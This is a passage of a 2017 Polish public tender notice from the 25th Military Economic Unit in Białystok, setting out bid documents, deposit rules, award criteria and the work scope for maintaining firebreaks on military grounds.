2)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, w przypadku oferty wspólnej, zaświadczenie to musi złożyć każdy z podmiotów składających wspólną ofertę
3)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp, w przypadku oferty wspólnej, zaświadczenie to musi złożyć każdy z podmiotów składających wspólną ofertę (Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawcę w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. - Prawo restrukturyzacyjne (Dz. U. poz. 978, z późn. zm.) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. - Prawo upadłościowe (Dz. U. z 2015 r. poz. 233, z późn. zm.);
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Wraz z ofertą Wykonawca składa:
1.1.	Formularz ofertowy - Załącznik nr 1 do SIWZ.
1.2.	Aktualne na dzień składania ofert oświadczenie 
Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu- Załącznik nr 2 do SIWZ.
1.3.	Wadium- potwierdzenie wpłaty.

Uwaga! Powyższe oświadczenie dotyczy również każdego z wykonawców wspólnie ubiegających się o zamówienie oraz podmiotów (w tym podwykonawców), na zasoby których Wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu.
1.2.1	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o którym mowa w rozdziale VI pkt 1 ppkt 1.2 (załącznik nr 2 do SIWZ) składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia. 
1.2.2	Zamawiający żąda aby Wykonawca, który zamierza powierzyć wykonanie części zamówienia Podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu złożył oświadczenie o którym mowa w rozdziale VI pkt 1 ppkt 1.2 (załącznik nr 2 do SIWZ). 
1.2.3	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby - warunków udziału w postępowaniu składa oświadczenie o którym mowa w rozdziale VI pkt 1 ppkt 1.2  (załącznik nr 2 do SIWZ). 

Zgodnie z art. 24 ust. 11 Pzp, w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji o której mowa w art. 86 ust. 5, każdy Wykonawca przekazuje zamawiającemu oryginał oświadczenia  o przynależności lub braku przynależności do tej samej grupy kapitałowej,  o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp.
Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody,              że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji                w postępowaniu o udzielenie zamówienia.
Oświadczenie składa każdy Wykonawca.
Załącznik stanowiący- oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którym mowa w art. 24 ust. 1 pkt 23 Pzp - będzie do pobrania ze strony internetowej Zamawiającego i zostanie zamieszczony w dniu otwarcia ofert tj. 05.05.2017r.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: 
CZĘŚĆ 1- 1.000,00 zł (słownie: jeden tysiąc złotych 00/100). 
CZĘŚĆ 2- 2.000,00 zł (słownie: dwa tysiące złotych 00/100). 
CZĘŚĆ 3- 1.500,00 zł (słownie: jeden tysiąc, pięćset złotych 00/100). 

1.1.	Prawidłowo złożone wadium wnosi się przed upływem terminu składania ofert tj. do 05 maja 2017r. r. do godz. 09:00. 
1.2.	Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym wyżej terminie znajdzie się na koncie Zamawiającego (widnieje jako zaksięgowane).
1.3.	Wadium może być wnoszone w jednej lub w kilku następujących formach: 
	pieniądzu;
	poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	gwarancjach bankowych;
	gwarancjach ubezpieczeniowych;
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r poz. 259.). 
Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy Zamawiającego prowadzony przez: NBP O/O Białystok nr konta  61 1010 1049 0050 7613 9120 2000 z dopiskiem wadium w post. nr 23/PN/2017 cz. Pielęgnacja pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG z podziałem na 3 części 
1.4.	Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. 
UWAGA: W orzecznictwie Krajowej Izby Odwoławczej uznaje się, iż wniesienie wadium jest skuteczne tylko w przypadku uznania rachunku bankowego zamawiającego należną kwotą wadium. Kwota wadium wnoszonego w formie pieniężnej winna znaleźć się na rachunku zamawiającego przed upływem terminu złożenia oferty. Zlecenie przelewu kwoty wadium - przed upływem terminu składania ofert - nie ma znaczenia dla dotrzymania wymogów związanych z terminem jego wniesienia, liczy się termin zarachowania środków na koncie zamawiającego. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert podlega bezwzględnie wykluczeniu z udziału w przetargu.  Dzieje się tak nawet w sytuacji, gdy spóźnienie wynosi kilka minut i wynika z operacji bankowych związanych z uznaniem rachunku zamawiającego.
1.5.	Wadium (oryginał dokumentu) wnoszone w pozostałych formach, należy złożyć w Kancelarii 25 Wojskowego Oddziału Gospodarczego                             w Białymstoku, w kopercie zapewniającej nienaruszalność dokumentu. Kopię dokumentu należy załączyć do oferty. 
1.6.	W przypadku składania oferty wspólnej, wadium wniesione przez jednego 
z Wykonawców uważa się za wniesione prawidłowo.
1.7.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.
1.8.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczania na poczet zabezpieczenia należytego wykonania umowy określa ustaw Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy, 
w stosunku do treści oferty, w zakresie:
1)	sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielenia zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona
2)	terminu realizacji przedmiotu zamówienia (w sposób proporcjonalny), gdy wystąpi zjawisko siły wyższej mające wpływ na termin realizacji. Podstawą dokonania zmiany będzie wniosek złożony przez Wykonawcę w terminie 30 dni od wystąpienia zjawiska siły wyższej wraz z dokumentacją potwierdzającą, że miało ono bezpośredni wpływ na wykonanie umowy
2.	Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/05/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              JĘZYK POSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Pielęgnacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Białystok.
2.	Rodzaj prac do wykonania: 
2.1.	Mineralizacja istniejących pasów przeciwpożarowych o szerokości 3 m               i szacunkowej długości  7,500 m (powierzchnia 2,250 ha) poprzez:
a.	orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm                        i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.	przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt
2.2.	Wykonanie oprysku środkiem chwastobójczym zmineralizowanego pasa ppoż (pow. 2,25 ha)
2.3.	Wycinka samosiejek na terenie o łącznej powierzchni 2 ha w miejscach wskazanych przez Zamawiającego oraz i wykoszenie trawy na terenie o łącznej powierzchni  8,5 ha w miejscach wskazanych przez Zamawiającego poprzez:
a.	wykoszenie trawy, chwastów oraz wycięciu samosiejek na wskazanej powierzchni, przy czym wysokość trawy po skoszeniu nie powinna być wyższa niż 7 cm, a pozostałych pni po samosiejkach 10 cm,
b.	wykoszone trawy i chwasty należy zebrać i wywieźć na koszt Wykonawcy a wycięte samosiejki złożyć w miejscu wskazanym przez Zamawiającego.
c.	wycince podlegają samosiejki  krzewy w wieku do 10 lat oraz samosiejki o obwodzie na wysokości 5 cm od podstawy .
3.	Częstotliwość wykonywania zabiegów:
a.	mineralizacja pasów  ppoż.  dwa razy w roku: 
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.10.2017r. 31.10.2017r.
b.	wycinka samosiejek i wykoszenie trawy  jeden raz w roku od 01.07.2017r. do 31.08.2017r. (szczegółowy termin zostanie ustalony                             z Zamawiającym)
c.	Wykonanie oprysków środkiem chwastobójczym  jeden raz w roku od 01.08.2017r do 15.08.2017r.
Zamawiający informuje, że nie wymaga określonych cech usługi, dotyczących dostosowania usługi do potrzeb wszystkich użytkowników                     z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych w nawiązaniu do art. 30 ust. 9 pkt 1 i niniejszej treści SIWZ.
Przedmiotem zamówienia jest usługa pielęgnacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG.
Usługa została podzielona na trzy części:
Część I
Pielęgnacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona

Warunki ogólne
Pasy i wały przeciwpożarowe na dzień odbioru muszą być oczyszczone                      z gałęzi, samosiejek, wykoszonych lub wyoranych traw, wrzosów itp..
Pielęgnacja pasów musi być wykonana poprzez orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową. 
W miejscach niedostępnych dla ciągnika rolniczego pasy należy zmineralizować glebogryzarką ręczną. 
Szczegółowy zakres robót oraz ich częstotliwość określona została dla każdej części usługi w szczegółowym zakresie działania odrębnie, z uwagi 
na specyfikę przyrodniczą kompleksów.
Upoważniony przedstawiciel Zamawiającego lub osoba przez niego wyznaczona wskaże Wykonawcy miejsce realizacji usługi.
Wykonawca przed przystąpieniem do realizacji usługi dostarcza 
do Infrastruktury 25 WOG listę pracowników i wykaz sprzętu uczestniczącego 
w  zadaniu. 
5.	Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę zgodnie z ustawą z dn. 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r, poz. 1502 ze zm.), zawartej na czas realizacji zamówienia co najmniej 1 osoby wykonującej w szczególności czynności: koszenie, wycinanie, rekultywacja przy czym: 
       Wymagania dotyczące zatrudnienia osób uczestniczących w realizacji zamówienia na podstawie umowy o pracę
5a)	rodzaj czynności osób realizujących zamówienie, do których ma zastosowanie obowiązek zatrudnienia na umowę o pracę:
5b)	Dokumentowanie zatrudnienia osób o których mowa w pkt. 5a) przez 
             Wykonawcę/Podwykonawcę na umowę o pracę:
5.1	Oświadczenie zawierające wykaz osób, o których mowa w pkt. 5a) (załącznik nr 7), z którymi zawarto umowę o pracę.
5.2	Termin na dostarczenie powyższego dokumentu:
a)	3 dni robocze od  dnia podpisania umowy;
b)	3 dni robocze po dokonaniu zmiany pracownika w trakcie realizacji zamówienia;
c)	 Sposób prowadzenia kontroli przez Zamawiającego w zakresie spełniana warunku zatrudnienia osób na umowę o pracę, o których mowa w art. 29 ust. 3a ustawy pzp:
Zgodnie z projektem umowy, który stanowi załącznik do siwz.
d)	Sankcje za naruszenie obowiązku zatrudnienia osób na umowę o pracę wykonujących czynności, o których mowa wyszczególnione są  w zapisach projektu umowy załącznik do siwz.

	Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem przez nich prac, ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego zgodnie Decyzją Nr 19 Ministra Obrony Narodowej z dnia 24.01.2017 roku w sprawie organizowania współpracy międzynarodowej                    w resorcie obrony narodowej (Dz. Urz. MON poz. 18). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu. 
Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy                       w miejscu realizacji robót oraz zachowanie bezpieczeństwa pożarowego.
Pracownicy Wykonawcy przed przystąpieniem do realizacji usługi zostaną zapoznani przez przedstawiciela Użytkownika lub osobę przez niego upoważnioną z uregulowaniami dotyczącymi wstępu na obszar chroniony,                         z systemem przepustkowym, zakazami lub nakazami obowiązującymi na danym terenie, w tym używania telefonów komórkowych, wykonywania zdjęć, przyjmowania interesantów itp.  
Przed rozpoczęciem robót wszyscy pracownicy realizujący usługę na terenie kompleksów wojskowych 2RBLog w Składach Hajnówka i Osowiec powinni okazać zaświadczenie o aktualnym szkoleniu w zakresie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010 rok o ochronie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010r. o ochronie informacji niejawnych (Dz.U. z 2016r.  poz.1167 t.j.). W przypadku braku zaświadczenia o szkoleniu                         z zakresu ochrony informacji niejawnych zostanie ono przeprowadzone przez Pełnomocnika Ochrony Informacji Niejawnych 2RBLog lub osobę przez niego upoważnioną. Szkolenie przeprowadzone będzie bezpłatnie.
Terminy przeprowadzenia zabiegów określono szczegółowo w każdej części zadania. Wykonana usługa musi być potwierdzona protokołem odbioru.  Brak zatwierdzonego protokołu będzie równoznaczny z niewykonaniem usługi. Protokół odbioru usługi z każdego zabiegu jest załącznikiem do faktury VAT wystawionej przez Wykonawcę. Wyszczególnione w opisie przedmiotu zamówienia czynności Wykonawca zamówienia wykonuje na własny koszt. Wykonawca ma obowiązek zachować w tajemnicy wszelkie informacje uzyskane w czasie pracy.
Usługi powinny być zrealizowane zgodnie z obowiązującymi normami branżowymi, przepisami ochrony środowiska i bez stworzenia zagrożeń dla zdrowia ludzi.
Przewiduję się wizję lokalną w celu oszacowania stopnia trudności i warunków realizacji zadania.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>75251120-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA </td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: 
CZĘŚĆ 1- 1.000,00 zł (słownie: jeden tysiąc złotych 00/100
WIZJA LOKALNA:
Termin wizji lokalnej zostaje wyznaczony na dzień:
	Część I- OC Zielona-  28.04.2017r. o godz. 09:00. 
 Osoba do kontaktu Aneta MAZUR tel. 261 39 88 49
Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. 
Zebranie o którym mowa powyżej, nie jest zebraniem wykonawców                         o którym mowa w art. 38 ust. 3 ustawy Pzp.
Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po zebraniu wykonawców należy kierować do Zamawiającego zachowując formę pisemną na adres e-mail: 25wog.kancelaria@ron.mil.pl lub fax: 261 39 88 13.

<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część II  Pielęgnacja pasów przeciwpożarowych  rejon Skład Osowiec<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.	Rodzaj prac do wykonania:
Pielęgnacja pasów ppoż. przy budynkach magazynowych oraz pasów obwodnicy (łączna powierzchnia pasów 13,600 ha) poprzez  wykonanie orki pługiem a w miejscach niedostępnych dla ciągnika rolniczego glebogryzarką ręczną, bronowanie przeoranych pasów wraz z oczyszczeniem terenu, oraz oczyszczeniem ogrodzenia obwodnicy usytuowanego na pasach ppoż.                       z wszelkiej wrastającej roślinności, chwastów i samosiejek: 
a.	przy budynkach magazynowych o szerokości 2 m i łącznej powierzchni 0,68 ha;
b.	wzdłuż ogrodzeń obwodnicy (pasy zewnętrzne i wewnętrzne)                            o szerokości 5 m, długości 15 240 m i łącznej powierzchni 7,62 ha
c.	wzdłuż ogrodzenia zewnętrznego kompleksu od strony drogi krajowej nr 65 o szerokości 2 m i długości 2 200m (powierzchnia 0,11 ha), szerokości 3 m              i długości 575 m (powierzchnia 0,17 ha)
d.	pas ochronny usytuowany po obu stronach drogi wewnętrznej między ogrodzeniem o szerokości 7,00 m i długości 7200 m (powierzchnia 5,04 ha)
3. Zakres usługi obejmuje:
